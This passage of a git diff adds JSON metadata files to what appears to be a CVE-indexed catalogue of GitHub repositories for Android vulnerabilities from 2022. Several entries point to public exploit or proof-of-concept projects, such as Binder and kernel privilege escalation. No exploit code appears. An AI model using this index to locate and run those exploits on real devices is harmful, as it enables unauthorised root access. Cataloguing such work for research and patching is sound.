"watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20186.json b/2022/CVE-2022-20186.json new file mode 100644 index 0000000000..4381e2f1be --- /dev/null +++ b/2022/CVE-2022-20186.json @@ -0,0 +1,64 @@ +[ + { + "id": 578715432, + "name": "CVE-2022-20186_CTXZ", + "full_name": "Bariskizilkaya\/CVE-2022-20186_CTXZ", + "owner": { + "login": "Bariskizilkaya", + "id": 39498732, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39498732?v=4", + "html_url": "https:\/\/github.com\/Bariskizilkaya", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Bariskizilkaya\/CVE-2022-20186_CTXZ", + "description": null, + "fork": false, + "created_at": "2022-12-15T17:57:26Z", + "updated_at": "2024-10-28T11:27:09Z", + "pushed_at": "2022-10-30T12:26:06Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 821468476, + "name": "CVE-2022-20186", + "full_name": "SmileTabLabo\/CVE-2022-20186", + "owner": { + "login": "SmileTabLabo", + "id": 112930114, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112930114?v=4", + "html_url": "https:\/\/github.com\/SmileTabLabo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SmileTabLabo\/CVE-2022-20186", + "description": null, + "fork": false, + "created_at": "2024-06-28T15:53:30Z", + "updated_at": "2024-06-28T17:27:31Z", + "pushed_at": "2024-06-28T17:05:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": true, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20223.json b/2022/CVE-2022-20223.json new file mode 100644 index 0000000000..9a8e9a6455 --- /dev/null +++ b/2022/CVE-2022-20223.json @@ -0,0 +1,33 @@ +[ + { + "id": 878325587, + "name": "cve-2022-20223", + "full_name": "xbee9\/cve-2022-20223", + "owner": { + "login": "xbee9", + "id": 183838019, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/183838019?v=4", + "html_url": "https:\/\/github.com\/xbee9", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xbee9\/cve-2022-20223", + "description": "A simple bash script for exploiting Android 10\/11\/12 using cve-2022-20223.", + "fork": false, + "created_at": "2024-10-25T07:22:46Z", + "updated_at": "2024-10-25T07:29:30Z", + "pushed_at": "2024-10-25T07:29:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20224.json b/2022/CVE-2022-20224.json new file mode 100644 index 0000000000..28ce603479 --- /dev/null +++ b/2022/CVE-2022-20224.json @@ -0,0 +1,64 @@ +[ + { + "id": 526077942, + "name": "system_bt_AOSP10_r33_CVE-2022-20224", + "full_name": "ShaikUsaf\/system_bt_AOSP10_r33_CVE-2022-20224", + "owner": { + "login": "ShaikUsaf", + "id": 100413972, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100413972?v=4", + "html_url": "https:\/\/github.com\/ShaikUsaf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ShaikUsaf\/system_bt_AOSP10_r33_CVE-2022-20224", + "description": null, + "fork": false, + "created_at": "2022-08-18T06:04:41Z", + "updated_at": "2022-08-18T06:22:42Z", + "pushed_at": "2022-08-18T06:24:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 624387380, + "name": "platform_system_bt_AOSP10_r33_CVE-2022-20224", + "full_name": "hshivhare67\/platform_system_bt_AOSP10_r33_CVE-2022-20224", + "owner": { + "login": "hshivhare67", + "id": 67005408, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4", + "html_url": "https:\/\/github.com\/hshivhare67", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hshivhare67\/platform_system_bt_AOSP10_r33_CVE-2022-20224", + "description": null, + "fork": false, + "created_at": "2023-04-06T11:02:47Z", + "updated_at": "2023-04-06T11:08:20Z", + "pushed_at": "2023-04-06T11:09:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20229.json b/2022/CVE-2022-20229.json new file mode 100644 index 0000000000..fd3a550104 --- /dev/null +++ b/2022/CVE-2022-20229.json @@ -0,0 +1,33 @@ +[ + { + "id": 526095462, + "name": "system_bt_AOSP10_r33_CVE-2022-20229", + "full_name": "ShaikUsaf\/system_bt_AOSP10_r33_CVE-2022-20229", + "owner": { + "login": "ShaikUsaf", + "id": 100413972, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100413972?v=4", + "html_url": "https:\/\/github.com\/ShaikUsaf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ShaikUsaf\/system_bt_AOSP10_r33_CVE-2022-20229", + "description": null, + "fork": false, + "created_at": "2022-08-18T07:02:43Z", + "updated_at": "2022-10-11T16:09:15Z", + "pushed_at": "2022-08-18T07:07:40Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20338.json b/2022/CVE-2022-20338.json new file mode 100644 index 0000000000..89a5cce88d --- /dev/null +++ b/2022/CVE-2022-20338.json @@ -0,0 +1,95 @@ +[ + { + "id": 718530988, + "name": "frameworks_base_AOSP_06_r22_CVE-2022-20338", + "full_name": "Satheesh575555\/frameworks_base_AOSP_06_r22_CVE-2022-20338", + "owner": { + "login": "Satheesh575555", + "id": 102573923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4", + "html_url": "https:\/\/github.com\/Satheesh575555", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Satheesh575555\/frameworks_base_AOSP_06_r22_CVE-2022-20338", + "description": null, + "fork": false, + "created_at": "2023-11-14T09:21:58Z", + "updated_at": "2023-11-14T10:03:13Z", + "pushed_at": "2023-11-14T09:44:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 720348499, + "name": "frameworks_base_AOSP10_r33_CVE-2022-20338", + "full_name": "Trinadh465\/frameworks_base_AOSP10_r33_CVE-2022-20338", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_base_AOSP10_r33_CVE-2022-20338", + "description": null, + "fork": false, + "created_at": "2023-11-18T07:44:41Z", + "updated_at": "2023-11-18T07:44:41Z", + "pushed_at": "2023-11-18T07:44:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 720410510, + "name": "frameworks_base_AOSP_10_r33_CVE-2022-20338", + "full_name": "Trinadh465\/frameworks_base_AOSP_10_r33_CVE-2022-20338", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_base_AOSP_10_r33_CVE-2022-20338", + "description": null, + "fork": false, + "created_at": "2023-11-18T12:02:22Z", + "updated_at": "2023-11-18T12:45:06Z", + "pushed_at": "2023-11-18T13:52:26Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20347.json b/2022/CVE-2022-20347.json new file mode 100644 index 0000000000..c6386c941b --- /dev/null +++ b/2022/CVE-2022-20347.json @@ -0,0 +1,95 @@ +[ + { + "id": 536559328, + "name": "packages_apps_settings_AOSP10_r33_CVE-2022-20347", + "full_name": "ShaikUsaf\/packages_apps_settings_AOSP10_r33_CVE-2022-20347", + "owner": { + "login": "ShaikUsaf", + "id": 100413972, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100413972?v=4", + "html_url": "https:\/\/github.com\/ShaikUsaf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ShaikUsaf\/packages_apps_settings_AOSP10_r33_CVE-2022-20347", + "description": null, + "fork": false, + "created_at": "2022-09-14T12:06:24Z", + "updated_at": "2022-09-15T01:06:38Z", + "pushed_at": "2022-09-14T12:06:24Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 537400803, + "name": "packages_apps_Settings_AOSP10_r33_CVE-2022-20347", + "full_name": "Trinadh465\/packages_apps_Settings_AOSP10_r33_CVE-2022-20347", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/packages_apps_Settings_AOSP10_r33_CVE-2022-20347", + "description": null, + "fork": false, + "created_at": "2022-09-16T09:59:04Z", + "updated_at": "2022-09-16T09:59:04Z", + "pushed_at": "2022-09-16T09:59:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 624363447, + "name": "platform_packages_apps_settings_AOSP10_r33_CVE-2022-20347", + "full_name": "hshivhare67\/platform_packages_apps_settings_AOSP10_r33_CVE-2022-20347", + "owner": { + "login": "hshivhare67", + "id": 67005408, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4", + "html_url": "https:\/\/github.com\/hshivhare67", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hshivhare67\/platform_packages_apps_settings_AOSP10_r33_CVE-2022-20347", + "description": null, + "fork": false, + "created_at": "2023-04-06T09:54:28Z", + "updated_at": "2023-04-06T10:32:43Z", + "pushed_at": "2023-04-07T03:29:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20360.json b/2022/CVE-2022-20360.json new file mode 100644 index 0000000000..9951fda4f6 --- /dev/null +++ b/2022/CVE-2022-20360.json @@ -0,0 +1,33 @@ +[ + { + "id": 645233752, + "name": "packages_apps_Settings_AOSP_10_r33_CVE-2022-20360", + "full_name": "726232111\/packages_apps_Settings_AOSP_10_r33_CVE-2022-20360", + "owner": { + "login": "726232111", + "id": 34729943, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34729943?v=4", + "html_url": "https:\/\/github.com\/726232111", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/726232111\/packages_apps_Settings_AOSP_10_r33_CVE-2022-20360", + "description": null, + "fork": false, + "created_at": "2023-05-25T07:56:24Z", + "updated_at": "2023-05-25T07:56:24Z", + "pushed_at": "2022-09-09T07:35:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20361.json b/2022/CVE-2022-20361.json new file mode 100644 index 0000000000..febc0f3e81 --- /dev/null +++ b/2022/CVE-2022-20361.json @@ -0,0 +1,38 @@ +[ + { + "id": 525921405, + "name": "blur", + "full_name": "francozappa\/blur", + "owner": { + "login": "francozappa", + "id": 4628017, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4628017?v=4", + "html_url": "https:\/\/github.com\/francozappa", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/francozappa\/blur", + "description": "BLURtooth: Exploiting Cross-Transport Key Derivation in Bluetooth Classic and Bluetooth Low Energy [CVE-2020-15802] [CVE-2022-20361]", + "fork": false, + "created_at": "2022-08-17T19:05:38Z", + "updated_at": "2024-11-22T02:56:40Z", + "pushed_at": "2022-08-17T19:20:34Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bluetooth", + "bluetooth-le", + "bluetooth-low-energy", + "ctkd" + ], + "visibility": "public", + "forks": 5, + "watchers": 17, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20409.json b/2022/CVE-2022-20409.json new file mode 100644 index 0000000000..ef8025482e --- /dev/null +++ b/2022/CVE-2022-20409.json @@ -0,0 +1,37 @@ +[ + { + "id": 569017471, + "name": "bad_io_uring", + "full_name": "Markakd\/bad_io_uring", + "owner": { + "login": "Markakd", + "id": 18663141, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18663141?v=4", + "html_url": "https:\/\/github.com\/Markakd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Markakd\/bad_io_uring", + "description": "Android kernel exploitation for CVE-2022-20409", + "fork": false, + "created_at": "2022-11-21T22:42:50Z", + "updated_at": "2025-01-05T19:20:06Z", + "pushed_at": "2024-10-17T16:26:39Z", + "stargazers_count": 164, + "watchers_count": 164, + "has_discussions": false, + "forks_count": 24, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "android-exploitation", + "android-root", + "kernel-exploitation" + ], + "visibility": "public", + "forks": 24, + "watchers": 164, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20413.json b/2022/CVE-2022-20413.json new file mode 100644 index 0000000000..7881fd520b --- /dev/null +++ b/2022/CVE-2022-20413.json @@ -0,0 +1,33 @@ +[ + { + "id": 589955117, + "name": "frameworks_av-r33_CVE-2022-20413", + "full_name": "pazhanivel07\/frameworks_av-r33_CVE-2022-20413", + "owner": { + "login": "pazhanivel07", + "id": 97434034, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97434034?v=4", + "html_url": "https:\/\/github.com\/pazhanivel07", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pazhanivel07\/frameworks_av-r33_CVE-2022-20413", + "description": null, + "fork": false, + "created_at": "2023-01-17T10:33:22Z", + "updated_at": "2023-03-23T01:13:28Z", + "pushed_at": "2023-01-17T11:20:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20421.json b/2022/CVE-2022-20421.json new file mode 100644 index 0000000000..d1a4269372 --- /dev/null +++ b/2022/CVE-2022-20421.json @@ -0,0 +1,33 @@ +[ + { + "id": 617890338, + "name": "badspin", + "full_name": "0xkol\/badspin", + "owner": { + "login": "0xkol", + "id": 58270928, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58270928?v=4", + "html_url": "https:\/\/github.com\/0xkol", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xkol\/badspin", + "description": "Bad Spin: Android Binder Privilege Escalation Exploit (CVE-2022-20421)", + "fork": false, + "created_at": "2023-03-23T10:25:59Z", + "updated_at": "2025-01-01T14:03:35Z", + "pushed_at": "2023-05-27T15:39:41Z", + "stargazers_count": 237, + "watchers_count": 237, + "has_discussions": false, + "forks_count": 32, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 32, + "watchers": 237, + "score": 0, + "subscribers_count": 7 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20452.json b/2022/CVE-2022-20452.json new file mode 100644 index 0000000000..acfc43821e --- /dev/null +++ b/2022/CVE-2022-20452.json @@ -0,0 +1,33 @@ +[ + { + "id": 587387036, + "name": "LeakValue", + "full_name": "michalbednarski\/LeakValue", + "owner": { + "login": "michalbednarski", + "id": 1826899, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1826899?v=4", + "html_url": "https:\/\/github.com\/michalbednarski", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/michalbednarski\/LeakValue", + "description": "Exploit for CVE-2022-20452, privilege escalation on Android from installed app to system app (or another app) via LazyValue using Parcel after recycle()", + "fork": false, + "created_at": "2023-01-10T16:24:51Z", + "updated_at": "2024-12-30T08:15:22Z", + "pushed_at": "2023-04-12T17:28:49Z", + "stargazers_count": 281, + "watchers_count": 281, + "has_discussions": false, + "forks_count": 51, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 51, + "watchers": 281, + "score": 0, + "subscribers_count": 9 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20456.json b/2022/CVE-2022-20456.json new file mode 100644 index 0000000000..8cbb35dd43 --- /dev/null +++ b/2022/CVE-2022-20456.json @@ -0,0 +1,33 @@ +[ + { + "id": 647688194, + "name": "platform_frameworks_base_AOSP10_r33_CVE-2022-20456", + "full_name": "hshivhare67\/platform_frameworks_base_AOSP10_r33_CVE-2022-20456", + "owner": { + "login": "hshivhare67", + "id": 67005408, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4", + "html_url": "https:\/\/github.com\/hshivhare67", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hshivhare67\/platform_frameworks_base_AOSP10_r33_CVE-2022-20456", + "description": null, + "fork": false, + "created_at": "2023-05-31T10:07:10Z", + "updated_at": "2023-05-31T10:15:36Z", + "pushed_at": "2023-05-31T10:13:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20470.json b/2022/CVE-2022-20470.json new file mode 100644 index 0000000000..a0f558fc0f --- /dev/null +++ b/2022/CVE-2022-20470.json @@ -0,0 +1,33 @@ +[ + { + "id": 584611982, + "name": "frameworks_base_AOSP10_r33_CVE-2022-20470", + "full_name": "Trinadh465\/frameworks_base_AOSP10_r33_CVE-2022-20470", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_base_AOSP10_r33_CVE-2022-20470", + "description": null, + "fork": false, + "created_at": "2023-01-03T03:54:59Z", + "updated_at": "2023-03-27T01:47:22Z", + "pushed_at": "2023-01-03T04:01:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20473.json b/2022/CVE-2022-20473.json new file mode 100644 index 0000000000..86eab365e6 --- /dev/null +++ b/2022/CVE-2022-20473.json @@ -0,0 +1,64 @@ +[ + { + "id": 584289667, + "name": "frameworks_minikin_AOSP10_r33_CVE-2022-20473", + "full_name": "Trinadh465\/frameworks_minikin_AOSP10_r33_CVE-2022-20473", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_minikin_AOSP10_r33_CVE-2022-20473", + "description": null, + "fork": false, + "created_at": "2023-01-02T05:55:37Z", + "updated_at": "2023-01-02T05:55:37Z", + "pushed_at": null, + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 584624006, + "name": "frameworks_minikin_AOSP10_r33-CVE-2022-20473", + "full_name": "Trinadh465\/frameworks_minikin_AOSP10_r33-CVE-2022-20473", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_minikin_AOSP10_r33-CVE-2022-20473", + "description": null, + "fork": false, + "created_at": "2023-01-03T04:51:12Z", + "updated_at": "2023-01-03T04:53:10Z", + "pushed_at": "2023-01-03T04:53:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20474.json b/2022/CVE-2022-20474.json new file mode 100644 index 0000000000..cc35dbfcf7 --- /dev/null +++ b/2022/CVE-2022-20474.json @@ -0,0 +1,33 @@ +[ + { + "id": 888350695, + "name": "CVE-2022-20474", + "full_name": "cxxsheng\/CVE-2022-20474", + "owner": { + "login": "cxxsheng", + "id": 15044840, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15044840?v=4", + "html_url": "https:\/\/github.com\/cxxsheng", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cxxsheng\/CVE-2022-20474", + "description": "PoC of CVE-2022-20474", + "fork": false, + "created_at": "2024-11-14T08:48:59Z", + "updated_at": "2024-12-01T14:56:17Z", + "pushed_at": "2024-12-01T14:56:14Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20489.json b/2022/CVE-2022-20489.json new file mode 100644 index 0000000000..d33bb69681 --- /dev/null +++ b/2022/CVE-2022-20489.json @@ -0,0 +1,64 @@ +[ + { + "id": 647715589, + "name": "platform_frameworks_base_AOSP10_r33_CVE-2022-20489_old", + "full_name": "hshivhare67\/platform_frameworks_base_AOSP10_r33_CVE-2022-20489_old", + "owner": { + "login": "hshivhare67", + "id": 67005408, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4", + "html_url": "https:\/\/github.com\/hshivhare67", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hshivhare67\/platform_frameworks_base_AOSP10_r33_CVE-2022-20489_old", + "description": null, + "fork": false, + "created_at": "2023-05-31T11:22:01Z", + "updated_at": "2023-05-31T11:56:29Z", + "pushed_at": "2023-05-31T11:55:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 647728712, + "name": "platform_frameworks_base_AOSP10_r33_CVE-2022-20489", + "full_name": "hshivhare67\/platform_frameworks_base_AOSP10_r33_CVE-2022-20489", + "owner": { + "login": "hshivhare67", + "id": 67005408, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4", + "html_url": "https:\/\/github.com\/hshivhare67", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hshivhare67\/platform_frameworks_base_AOSP10_r33_CVE-2022-20489", + "description": null, + "fork": false, + "created_at": "2023-05-31T11:56:48Z", + "updated_at": "2023-05-31T12:05:37Z", + "pushed_at": "2023-05-31T12:03:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20490.json b/2022/CVE-2022-20490.json new file mode 100644 index 0000000000..b58aea06c9 --- /dev/null +++ b/2022/CVE-2022-20490.json @@ -0,0 +1,33 @@ +[ + { + "id": 647702001, + "name": "platform_frameworks_base_AOSP10_r33_CVE-2022-20490", + "full_name": "hshivhare67\/platform_frameworks_base_AOSP10_r33_CVE-2022-20490", + "owner": { + "login": "hshivhare67", + "id": 67005408, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4", + "html_url": "https:\/\/github.com\/hshivhare67", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hshivhare67\/platform_frameworks_base_AOSP10_r33_CVE-2022-20490", + "description": null, + "fork": false, + "created_at": "2023-05-31T10:45:35Z", + "updated_at": "2023-05-31T10:52:34Z", + "pushed_at": "2023-05-31T10:51:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20492.json b/2022/CVE-2022-20492.json new file mode 100644 index 0000000000..d6d69c2cfe --- /dev/null +++ b/2022/CVE-2022-20492.json @@ -0,0 +1,33 @@ +[ + { + "id": 647620143, + "name": "platform_frameworks_base_AOSP10_r33_CVE-2022-20492", + "full_name": "hshivhare67\/platform_frameworks_base_AOSP10_r33_CVE-2022-20492", + "owner": { + "login": "hshivhare67", + "id": 67005408, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4", + "html_url": "https:\/\/github.com\/hshivhare67", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hshivhare67\/platform_frameworks_base_AOSP10_r33_CVE-2022-20492", + "description": null, + "fork": false, + "created_at": "2023-05-31T07:07:40Z", + "updated_at": "2023-05-31T07:12:57Z", + "pushed_at": "2023-05-31T09:59:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20493.json b/2022/CVE-2022-20493.json new file mode 100644 index 0000000000..2c54f2b1e2 --- /dev/null +++ b/2022/CVE-2022-20493.json @@ -0,0 +1,33 @@ +[ + { + "id": 647669098, + "name": "frameworks_base_CVE-2022-20493", + "full_name": "Trinadh465\/frameworks_base_CVE-2022-20493", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_base_CVE-2022-20493", + "description": null, + "fork": false, + "created_at": "2023-05-31T09:18:01Z", + "updated_at": "2023-05-31T09:25:13Z", + "pushed_at": "2023-05-31T09:24:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20494.json b/2022/CVE-2022-20494.json new file mode 100644 index 0000000000..44698e0861 --- 